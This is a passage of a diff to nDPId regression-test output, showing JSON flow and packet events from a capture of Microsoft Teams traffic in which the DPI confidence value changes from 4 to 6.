-01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1587041687745,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1587041687745,"pkt":"KDc3AG3IEBMx8Tl2CABFAADTPBBAADkRgbLAqAEBwKgBBgA19Q8AvwAAY+WBgAABAAQAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQABwAwABQABAAAGxQAfCmV1bm8tMS1hcGkOdHJhZmZpY21hbmFnZXIDbmV0AMA8AAUAAQAAABUACwhldW5vLTEtMcATwGcABQABAAAAOgApHWFtcy1ldW5vLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwFbAfgABAAEAAAAVAAQ0qbp3"} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410} 
@@ -347,30 +353,30 @@ 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1587041690880,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1587041690880,"pkt":"EBMx8Tl2KDc3AG3ICABFAABSJv0AAP8REUbAqAEGwKgBAfm6ADUAPoc2eGoBAAABAAAAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQAB"} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1587041690915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":301,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":301,"pkt_l4_len":267,"thread_ts_msec":1587041690915,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEfVLxAADkRaLrAqAEBwKgBBgA1+boBCwAAeGqBgAABAAUAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAAACgAuHWFwcGxpY2F0aW9uaW5zaWdodHNfaW5nZXN0aW9uB21vbml0b3IFYXp1cmXALcBCAAUAAQAAAJEALB1hcHBsaWNhdGlvbmluc2lnaHRzX2luZ2VzdGlvbgtwcml2YXRlbGlua8BgwHwABQABAAAAXwAXAmRjDnRyYWZmaWNtYW5hZ2VyA25ldADAtAAFAAEAAAAeABwQY2ZyLWJyZWV6aWVzdC1pbghjbG91ZGFwcMDGwNcAAQABAAAABwAEKE+KKQ=="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} 
+00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00896{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2323,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041690916,"flow_last_seen":1587041690980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1679,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1587041690980,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
